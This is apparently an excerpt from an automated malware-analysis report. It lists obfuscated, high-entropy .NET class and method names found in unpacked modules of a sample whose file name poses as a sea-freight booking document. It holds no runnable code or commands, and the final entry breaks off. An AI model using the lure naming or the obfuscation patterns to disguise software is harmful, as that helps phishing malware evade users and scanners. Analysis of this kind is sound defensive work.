Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, whVbSFDbmJZTsAWLMmphob7SHg0R4bdRNw2BjvOoEgTOMDBCDU1CAVgGsNaFR02HhbWUm.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_3pDfniDpif4ffCBHzv5bH1QqY4RRTgrkEK1pAzNpcDMSMZ', 'xKtnUdWSHKGxkHapMrBiNIn04Rff5XQTqCAhUYQp3i1Ggx', 'IWSntankFfmsXsov89pEhnqj0oTXRR78x8ELNzBMVcL2JJ', '_8L49Fnel5Kq4GFLrTxXWrAGEUYk8hdJyXj47Eme6zHmspu'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	High entropy of concatenated method names: '_6koM63edaR5ulqE8qZJ1WgfYyvzN', '_7JiPm57tnavbvPzY74rgM9y1iJtT', 'Aruijh1no96v0wVBvnLbY4snFt73', 'ctiNUX9oq9EA4zH4jODZblffSAJF', 'uPdhKbuy6nqCVVLRnJ6jlllGGP6d', 'TiPpfFy5VhN0zMwKD1gVMbOzfSgC', 'lXZRxavinAOWbg1hvsGcejk4lw4T', 'KtJjpUvLXGQDROyJaC0DNFqmSRq2', 'xUy9HRbOaV30MYPN9VXbdD8DmCAG', 'LkU1GalO3bNCgLqOcLGi821bM6ee'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	High entropy of concatenated method names: 'Fp8pNXY4fhbes0H5oqiR8jKEBZEH', '_661Zzgo0pdE0U75TsTzuzFsDxHOT', 'rQ2gSBrFnkVUvLbZzLv5ga4o1pjx', 'UCcjzA6PAlfE2LxhvhTzGIXPhpAn', 'baQZZMeWmiqPU9EJp6SLbI5WXnomZoJDRueuC4pQoapccESUO2SzgGF5UW5HlaX2', 'A4xs6CjXolI6X30mxALRiJYTF8jqDZBrf40ysFqc4pWKIxeGhOeiWbew8EvVGJHd', 'b3cjtVyVHy9zn50JJ5VOzoqy9EMuKOGdSQmDI3WGcp0IZVtEsyfaieiqbwg2ahfZ', 'jWzPAkZaZrbCLng1y4jaCC6NLxIzXJIygYb4p4AFgh3XWrw1T9oOD8DL6DWBbM9m', 'f3fHFHct6Px3fevqcMWLBTtjkvfS5HcXz10fUaugglZl9jCzhTqBRW6VQu3ewMiq', 'yZoTAMVjT8hplHJxEV3mjagEx9xvoZqVFtOwVLOVjYWXniPhmYJo75x715dDVsz8'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, s9dzM1HbtTjuXC0T1gSDLB6YlRyDPDyrsQnUAGJGlfWeIFsb33G7o3.cs	High entropy of concatenated method names: 'YcCjk3IRCObvHMNKMfV5o4JSwqVjJYT1ETNC6aRecigMKuqUdX5APZ', 'ixJfdrn6LmwxBbYqgAQnXHR6cgG4nBXj4IdKSYxZWLEje25t7Nm6yU', 'uI78gH23bYal3ybMgr5SDQ3jxmJauyJOfydInZdQ8YffU2zELInMup', 'rdH4HQDf1a9aNYxd1TahzVo8PVO43P6qqwvd0G37maRMv3Z2YsRPmc', 'PaWhnJq9AXy51DsxUYezajDEGfJmiJBKsgzrEbVTlzuFPl2rzTRpN1', '_4BQ3DYannZfE3inYu8TtN3LJ7bFFN00q4eDZhhXWOtxUha', 'LYP31KzmBPtTPIrJIXUvUmQyEbR61Hucx3zGN638UF8FER', '_4ylbuqAJcOlS2lIcVcLmG4d4ZDytwPkBvYEzBziO5CSMPj', 'u5au5R4NydQwiRRRzPLH5eU6pdIvTWiifOU5lTaTXU3dUV', 'Vy38Lr2Vq6EYkCa15HxNy0HDTCTj4xkkNIU9G2f6a3p64C'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	High entropy of concatenated method names: 'Vf08JYGAkuTJj1mNDuDSCynOx0Aj', 'dH7UkHxKG6zZ76Y42GmShdJcWCsdbHvYbbyWkQQ7cK2zHuz3RxUM6rXRlDqFqjKIgPpcU8ZvUOylxb8ddA4Y19DpCFXx04uw', 'kliHKYqxak7Y74K8xlHEw9jt1cE0LM96QYNbTzXH4VXuyNOznmFWkMFlAcECwfovp7xJdAUUJl0snMeMOdCThGd90PFaBWeA', 'bbfKzODoV2L06uXUsb35VYp7jJKXS8TBJ1WNakloVaPAZs5WhPpM9tumpwLjeXQxrZBA6gTGRhmttjSVhO5A2C80oBSC1WVP', 'aHd9iypJYBPTbdtQCl7Ok99x1nZUZsZEsznscbKdjYqFQj2Eh0WqN3YUy5jfCvoF4Hkovb9mJM9yDlly3rIm0ji28Sndw6UJ'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	High entropy of concatenated method names: 'Ththm9CTOMvvm2GyNP8Qzr24jCjdhMSqMKmhGwieTi4yMTgC9uFPmmdsAe4xySIKQP361XwPWd1jaCxGPBsjil', 'jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu', 'nAdoeyR1X8X4pimRSBLRLbXwGT6W9c31d2Z10qpK3IzMJnrNxioP5NQy25IioTNLsewZuuBGAaHrCzUj5jEOAh', 'dJQnzA612gtw8ujHxNeqyoOpAvcq8ssRQdsUZAPJ3IZR8rstxuV33yW272jijI13uLrtXrFKCCWd8euuaUY88b', 'u3NX2j7yUQ2p5r4rSnWttUtn1p6VOv7DiD5VILIwDty9G35z89Oov1SydYyzJhrxg4e7vxqrMtI5kzaavcpj4i', 'CPbcyxXDzJ13yCHordyvUP7bVO8xstIqlm68LEXaJo3q4Imu7yi53EXW0m26voMKdC1ab71UnUAqIVbSuUKUq4', 'fM95BZOdW1fmoxegIukzIdcbcty9Go2kvqFfc5EgSUVZfnVQmENPBKqb36sScN93vgiBPrDVnyajk7FoYGvHbC', 'fGAZW4e1W335OvTNw6qX9ZkZtnP6cnHp8wSZ3IDUIuPsNS75Rj1jVp7q2pfDknuUu0uag0KvV0cpgPsPR1a7VO', 'ej1ormzl2jKuOvMwjZ6nm4OM9aHYcjo27iz0oiFHIsNXUAA6XEkXASwwmlmE3nZrzYdlM8WD0aW1DucD6VIcio', 'K9kZlQvWNJvWU7lLA1FD5UujO7vk5bDIjo82PCKpprPgg4mufa91tBmYvFvdedKXqLJKPekHWnHrhD1pc3O63u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	High entropy of concatenated method names: 'B23wVkYTRRlbvZPXNLXxIoOG2zrc', '_1nQfddviA6nptTfkr6TfyQY4rgxN40GBmufbL4TjTGyzc4njPykP4mxfk7CDp08r', 'ConDlLttcHyi0bvUIXIvd7ZhdNhwTtGLWyDDdezukc6tpfqHJUpxh0Y8lIuoBBJO', 'xffgxamw2yiuFaeTRpUFcPK0Fb3CaJgPpY9bMzjBfhHYcGZYQWY3vbWC8ITRQJOV', 'b3Ceji6v4OiedAr2PLCKgpF3X5xQkHVhOQ5aKhoQL5ukRlGZsSklPpLulBwOFUqc'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	High entropy of concatenated method names: 'Y1ITG5MBR8142OiTMq6Zq60AoqWLOu7vDN9kZguwRz4rrKYDeseG8s', 'YRJFCxHjM7pPS4tNaT7iQrZf3P0nMtI4vOCFptxbgzKLYau24ZfSVv', 'nCJtZvaszp6oSFBL7GMdxt7QYF2vHScvtNGMXj2FMFL1HGIapNV4Nm', 'unpnLLLGMEjTQEUUBSj3mxvpQAbkt5HxZNTRjEyRODRSiZxTDm3ZG1', 'RAt0CxcgEb13BldbyvusZ6MAjrul1qh5NtQmMsF3SUmeKVwNx3CMeJ', 'duRVETZzWT64PiCNxiLb2ZTVL5cyIBFb0Tz44PVeMxvn6DYdrsjb0y', '_9hDXJ4K0XixM3bAx328T6bJ8kA4hPCruVIEYrs79DPLZYdXXXxG7C4', 'e4J5jbEn0rCBRh9jVC2QZTf9G24OA5JndJL1xso81EK2Rz4K5HXSVT', '_9jFrliaKxwwrVaHlKlmyHrIWBPEAljm6iyt2h7SJgRhygyHojB5BdN', '_9HnDvdBf3YlSqtdiZPhJ6vE7g42q2TY16T744fQeuQP8swsNcqvl7X'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	High entropy of concatenated method names: 'zqSbnYJ7TRzPGM4DTBz55wB90X1H', '_4oLwAniIUZb3pHfgNlXqONekWHg3', 'CDzVFa3gZC10reMa61ZgV5cAkx86', 'sRTHUEnQNBOe33KZfvWLwDJhWgNw', 'jVgxlhUWvyKuBGP8wBjwY8ZLosae', 'bpEpLSR4YKp0SwBpXSNr4FZBegZ3', 'JEcOqiKQuo1NMNAgJ57suc0Fv4mR', 'zXHcrIVLQWaWHBgyaBEeGMLqmc93', 'IMzLMpiHmTzbaQSc0F1wjAm9srhz', 'rHGQSVSfZ2Gp1JnWnS0x8LpowN1k'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, XuBBOyqZHedkChRurO.cs	High entropy of concatenated method names: 'duSZ0GBT1D', 'iJGZutdYTH', 'ptPZ2fx5xB', 'OhDZFgbBsy', 'dFfZoBbnkq', 'KmkZKFCRM7', 'OlNZwmNXfX', 'BH8Zf9IIul', 'BSgZElJexP', 'BymZIUuR4l'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, lLoOpbp98ceyYJEt7Q.cs	High entropy of concatenated method names: 'pxi3SRTcJ', 'xcMTrMTOZ', 'euJeBDWTj', 'Y6vOr9khC', 'XNhuUc6bP', 'GRWUZv07X', 'iixiONekonRbkIQxVT', 'ihPe84nADxxKEbGbXg', 'UARjNKU6L', 'mXF7Q1IVP'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, e3Vm7DUU0l9H9RyBUx.cs	High entropy of concatenated method names: 'oK2y1fDchN', 'iUNyOmcmnB', 'KcYlHMyR7P', 'uVglov0tav', 'gi6lKV6IlJ', 'oKPlMFSgMN', 'XM4lwp20dw', 'iwOlfuQ01L', 'sJ9ld0sZ3e', 'gpPlEkhZtt'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, kE2Srp2ld2AAdsRnJr.cs	High entropy of concatenated method names: 'OWCPN762bO', 'rfsPcVOtoL', 'DUZPybZDkG', 'RinPXRX6cn', 'BmyP4ZnOcj', 'GBtyClx496', 'KltyYkQ4I0', 'LTBytFXYTN', 'dDByhE5uQN', 'y3WyLnVSG9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, hM4Gbid7ianNtZiD8K.cs	High entropy of concatenated method names: 'GWlX9jiZYI', 'x1uXsJZ3yp', 'S4UX30AIGf', 'CQpXTyxe8n', 'v3nX13WmcB', 'C7mXecGXau', 'RsdXOivEio', 'aw3X0WNi6C', 'tsqXuHR1QM', 'W3BXUNQre5'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, HxNAiq5aRigM2OIS7K0.cs	High entropy of concatenated method names: 'UAJQ9gZTL6', 'pioQsNanLE', 'ySeQ3i7UCj', 'abVQTZryRI', 'akMQ1SRZik', 'WmQQeVHrQw', 'HXXQO69q4b', 'reUQ03pLg6', 'e7bQu0NlIW', 'Oo0QUbn27e'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, KaR3uUBI0MjM3PHugT.cs	High entropy of concatenated method names: 'oCAQ5sPUBr', 'ayiQVcftou', 'kujQrS3tXd', 'xq0QSLdNwT', 'h6oQcXDOcu', 'gERQyIlHPv', 'uKyQPHodAF', 'xJHjtydHWm', 'Lf2jhp2moM', 'oZKjLmI9Lk'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, EJxCOd0IK9HWBTygqT.cs	High entropy of concatenated method names: 'YOxcboSUkO', 'SCvcxf2s3i', 'vM7cimoL8W', 'wIPcW4K0cN', 'EHrcCNbSt0', 'KqxcYB1R5j', 'mxOcttvlma', 'SZ5chGX3AD', 'CXhcLBDlIe', 'wT0cB2A0t4'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, hSfCAGu12LdJc86UdL.cs	High entropy of concatenated method names: 'RbalTHaF87', 'BebleRZGyl', 'I4hl06a9lo', 'vw0luP5ZtK', 'xkVlJOKvRh', 'FoElm8ZPvh', 'zZrlAcjos4', 'KhQljFdkPG', 'PCalQqeZQf', 'yeil7ID6qX'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UYrVFP5VpNDvklhDEYZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Re77bBab9i', 'qj07x5QNvN', 'RGB7iWxWXn', 'Ixh7WggVY8', 'jew7CTFG3y', 'SVp7YoyEs5', 'txW7t7horV'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, NRj2udzPuinToaZAkR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvFQZovY2u', 'XYhQJ8hbbD', 'gNLQmXuctj', 'WOvQAjEgTa', 'sAQQj2U3sT', 'pjlQQlBdyX', 'KhGQ7Gb740'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, m1JhKuWAltth18afAA.cs	High entropy of concatenated method names: 'UhRAn6RCGf', 'u5JAvpuvAe', 'ToString', 'IhRASYpXwi', 'SLhAcuA29b', 'IifAlBmCbM', 'uJTAysBLEn', 'oxiAPE0BpS', 'IxEAXPnqC1', 'eOaA4pfacg'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, ErbZs0FKsqSRkoQOs9.cs	High entropy of concatenated method names: 'vEd70HmxuMqKWpebZi6', 'UfrJN8myxn22E0b4uwT', 'o3PUnkm6FfrAtReSwod', 'AB8Pjk2GPn', 'Ur4PQOHVWY', 'mWAP7E5Wmb', 'Rrg8GDm059NPq54hnoF', 'XVZy9PmjmWiiwNjSoXL'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, Jit5a6i5l2yO4HDS69.cs	High entropy of concatenated method names: 'ToString', 'iKZmI3tE7S', 'jLAmFicqCj', 'OeXmHbErlc', 'HhnmoLn7q3', 'bDkmKn6Uhl', 'iugmMkRxtE', 'tQ0mwedx4v', 'swBmf2pBn7', 'P57mdGEIFD'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, OUgrSjc9E7Xf2gdhkq.cs	High entropy of concatenated method names: 'Dispose', 'raM5L8Y5vV', 'SQ9pFXBOIM', 'muCmmrUARs', 'ego5BXfnv2', 'woI5z1vR9v', 'ProcessDialogKey', 'jEJpaHQHnP', 'nW5p5hfyC1', 'CKpppwaR3u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, kLsM8MYfJ8Mq09ivr4.cs	High entropy of concatenated method names: 'ssaAhwijh3', 'cvtABMfYQG', 'oM5ja6USSK', 'c5pj5rouXP', 'tHSAIRUPlT', 'ErMAR9nmyZ', 'A34Aq2HZc4', 'LovAbPFIdy', 'kNDAxUxIBm', 'DbdAicJ4ob'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, oHQHnPLvW5hfyC1eKp.cs	High entropy of concatenated method names: 'SBSj2iym1b', 'Aa9jFE5Fp7', 'TmcjHuT6f7', 'G0Ajon8F75', 'DMxjbUhxuR', 'rg8jK8fouM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, toXfnvh26oI1vR9vXE.cs	High entropy of concatenated method names: 'E1ejSXZ3cF', 'lTcjcBfF7Q', 'RhPjlLOcgZ', 'xSejyiGTyh', 'SvSjPWMKh6', 'AghjXmCJ1V', 'Wm5j47rPuG', 'HIAjkiSyoi', 'ThBjnpDkGK', 'VNDjvTmWas'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	High entropy of concatenated method names: 'igfVN8Y1LQ', 'NxBVSWcsyl', 'H1pVcbu3yZ', 'u4AVl4Xx1J', 'miiVyQn0Hr', 'BIdVP8BgwE', 'i7NVXKF4lf', 'RevV4MmKuj', 'Mo8VkkDvUw', 'Kg4VnbhPC9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, b6FpHuraoQLlIMotTo.cs	High entropy of concatenated method names: 'Vyu5XJxCOd', 'OK954HWBTy', 'w125nLdJc8', 'wUd5vLN3Vm', 'PyB5JUx4E2', 'frp5mld2AA', 'Xtekrbic51NgvwMxTI', 'lP60E7kFUtIOAdPDfa', 'X6O7h6JE6yC97g6pit', 'xaZ55yketZ'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, XuBBOyqZHedkChRurO.cs	High entropy of concatenated method names: 'duSZ0GBT1D', 'iJGZutdYTH', 'ptPZ2fx5xB', 'OhDZFgbBsy', 'dFfZoBbnkq', 'KmkZKFCRM7', 'OlNZwmNXfX', 'BH8Zf9IIul', 'BSgZElJexP', 'BymZIUuR4l'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, lLoOpbp98ceyYJEt7Q.cs	High entropy of concatenated method names: 'pxi3SRTcJ', 'xcMTrMTOZ', 'euJeBDWTj', 'Y6vOr9khC', 'XNhuUc6bP', 'GRWUZv07X', 'iixiONekonRbkIQxVT', 'ihPe84nADxxKEbGbXg', 'UARjNKU6L', 'mXF7Q1IVP'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, e3Vm7DUU0l9H9RyBUx.cs	High entropy of concatenated method names: 'oK2y1fDchN', 'iUNyOmcmnB', 'KcYlHMyR7P', 'uVglov0tav', 'gi6lKV6IlJ', 'oKPlMFSgMN', 'XM4lwp20dw', 'iwOlfuQ01L', 'sJ9ld0sZ3e', 'gpPlEkhZtt'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, kE2Srp2ld2AAdsRnJr.cs	High entropy of concatenated method names: 'OWCPN762bO', 'rfsPcVOtoL', 'DUZPybZDkG', 'RinPXRX6cn', 'BmyP4ZnOcj', 'GBtyClx496', 'KltyYkQ4I0', 'LTBytFXYTN', 'dDByhE5uQN', 'y3WyLnVSG9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, hM4Gbid7ianNtZiD8K.cs	High entropy of concatenated method names: 'GWlX9jiZYI', 'x1uXsJZ3yp', 'S4UX30AIGf', 'CQpXTyxe8n', 'v3nX13WmcB', 'C7mXecGXau', 'RsdXOivEio', 'aw3X0WNi6C', 'tsqXuHR1QM', 'W3BXUNQre5'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, HxNAiq5aRigM2OIS7K0.cs	High entropy of concatenated method names: 'UAJQ9gZTL6', 'pioQsNanLE', 'ySeQ3i7UCj', 'abVQTZryRI', 'akMQ1SRZik', 'WmQQeVHrQw', 'HXXQO69q4b', 'reUQ03pLg6', 'e7bQu0NlIW', 'Oo0QUbn27e'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, KaR3uUBI0MjM3PHugT.cs	High entropy of concatenated method names: 'oCAQ5sPUBr', 'ayiQVcftou', 'kujQrS3tXd', 'xq0QSLdNwT', 'h6oQcXDOcu', 'gERQyIlHPv', 'uKyQPHodAF', 'xJHjtydHWm', 'Lf2jhp2moM', 'oZKjLmI9Lk'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, EJxCOd0IK9HWBTygqT.cs	High entropy of concatenated method names: 'YOxcboSUkO', 'SCvcxf2s3i', 'vM7cimoL8W', 'wIPcW4K0cN', 'EHrcCNbSt0', 'KqxcYB1R5j', 'mxOcttvlma', 'SZ5chGX3AD', 'CXhcLBDlIe', 'wT0cB2A0t4'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, hSfCAGu12LdJc86UdL.cs	High entropy of concatenated method names: 'RbalTHaF87', 'BebleRZGyl', 'I4hl06a9lo', 'vw0luP5ZtK', 'xkVlJOKvRh', 'FoElm8ZPvh', 'zZrlAcjos4', 'KhQljFdkPG', 'PCalQqeZQf', 'yeil7ID6qX'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UYrVFP5VpNDvklhDEYZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Re77bBab9i', 'qj07x5QNvN', 'RGB7iWxWXn', 'Ixh7WggVY8', 'jew7CTFG3y', 'SVp7YoyEs5', 'txW7t7horV'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, NRj2udzPuinToaZAkR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvFQZovY2u', 'XYhQJ8hbbD', 'gNLQmXuctj', 'WOvQAjEgTa', 'sAQQj2U3sT', 'pjlQQlBdyX', 'KhGQ7Gb740'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, m1JhKuWAltth18afAA.cs	High entropy of concatenated method names: 'UhRAn6RCGf', 'u5JAvpuvAe', 'ToString', 'IhRASYpXwi', 'SLhAcuA29b', 'IifAlBmCbM', 'uJTAysBLEn', 'oxiAPE0BpS', 'IxEAXPnqC1', 'eOaA4pfacg'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, ErbZs0FKsqSRkoQOs9.cs	High entropy of concatenated method names: 'vEd70HmxuMqKWpebZi6', 'UfrJN8myxn22E0b4uwT', 'o3PUnkm6FfrAtReSwod', 'AB8Pjk2GPn', 'Ur4PQOHVWY', 'mWAP7E5Wmb', 'Rrg8GDm059NPq54hnoF', 'XVZy9PmjmWiiwNjSoXL'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, Jit5a6i5l2yO4HDS69.cs	High entropy of concatenated method names: 'ToString', 'iKZmI3tE7S', 'jLAmFicqCj', 'OeXmHbErlc', 'HhnmoLn7q3', 'bDkmKn6Uhl', 'iugmMkRxtE', 'tQ0mwedx4v', 'swBmf2pBn7', 'P57mdGEIFD'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, OUgrSjc9E7Xf2gdhkq.cs	High entropy of concatenated method names: 'Dispose', 'raM5L8Y5vV', 'SQ9pFXBOIM', 'muCmmrUARs', 'ego5BXfnv2', 'woI5z1vR9v', 'ProcessDialogKey', 'jEJpaHQHnP', 'nW5p5hfyC1', 'CKpppwaR3u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, kLsM8MYfJ8Mq09ivr4.cs	High entropy of concatenated method names: 'ssaAhwijh3', 'cvtABMfYQG', 'oM5ja6USSK', 'c5pj5rouXP', 'tHSAIRUPlT', 'ErMAR9nmyZ', 'A34Aq2HZc4', 'LovAbPFIdy', 'kNDAxUxIBm', 'DbdAicJ4ob'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, oHQHnPLvW5hfyC1eKp.cs	High entropy of concatenated method names: 'SBSj2iym1b', 'Aa9jFE5Fp7', 'TmcjHuT6f7', 'G0Ajon8F75', 'DMxjbUhxuR', 'rg8jK8fouM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, toXfnvh26oI1vR9vXE.cs	High entropy of concatenated method names: 'E1ejSXZ3cF', 'lTcjcBfF7Q', 'RhPjlLOcgZ', 'xSejyiGTyh', 'SvSjPWMKh6', 'AghjXmCJ1V', 'Wm5j47rPuG', 'HIAjkiSyoi', 'ThBjnpDkGK', 'VNDjvTmWas'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	High entropy of concatenated method names: 'igfVN8Y1LQ', 'NxBVSWcsyl', 'H1pVcbu3yZ', 'u4AVl4Xx1J', 'miiVyQn0Hr', 'BIdVP8BgwE', 'i7NVXKF4lf', 'RevV4MmKuj', 'Mo8VkkDvUw', 'Kg4VnbhPC9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, b6FpHuraoQLlIMotTo.cs	High entropy of concatenated method names: 'Vyu5XJxCOd', 'OK954HWBTy', 'w125nLdJc8', 'wUd5vLN3Vm', 'PyB5JUx4E2', 'frp5mld2AA', 'Xtekrbic51NgvwMxTI', 'lP60E7kFUtIOAdPDfa', 'X6O7h6JE6yC97g6pit', 'xaZ55yketZ'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.cs	High entropy of concatenated method names: 'GgpMcZhIjR4120pY8u6uCAiRH4QL01oA8al3eaKERyo7Gz', 'ox5p61KJCv91fSFYDHVf3yI6mIZn5ghkne6RW0Q8ZPdDkx', 'TkIpa4am8tCYuP2dbxBDwmHKEDZIHnVId2GnDhDqTVhJPo', '_3e2Pfn3Q4rzLu9onfN67v8ko7Z5GrYRUc35ZD0QCHbo1YY'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, PHumo8U1BHf4b2B0BWI8ZjmYpkj0.cs	High entropy of concatenated method names: 'RFCRLGhpvr9NYR00cC1jYzzhNoGc', 'IqIjmnuxJ3fJRXpWx5i6p06BvknH', 'h0QcBPr1tUpbbttnFh9pKeMIsLO0', 'JSwQAKrE3hy1Xa8kCeMUMHl7tDFE7zJBBkYpqtl37oquI8kO6qW3jvG253n2hGlwshqFcUIXl44Oait8Y', 'fhf8l63mvf58nkljMdtns2rS0jJ2Ku25GBqPsf8n0AKTalQsLlJ1tFYxXYqj7TVM2LHXF5CxOxaHtM6jA', 'vQNlFV5MYsgGnmsnjddhs1LPn3prl9t7ngD4qJeNWZriEhRxGwEXYYAjMr6ahuqzuXFsZfVbLVzkS41Vy', '_8AGsKmcQHxtfYjXjvmBkfPnUSkoIgwMqT93GOJ9ShoozPTN2nEFJUp1bsZ9zGgtDGeiV63iY7TYgp9hVJ', 'tjTEJDI9pAPfnZ6wp0X14AFZ0NjjbgGWPfaONvZW9uBIRqGF58ytx59qIdox5dfKk6pi14jdQPhI5tn1s', 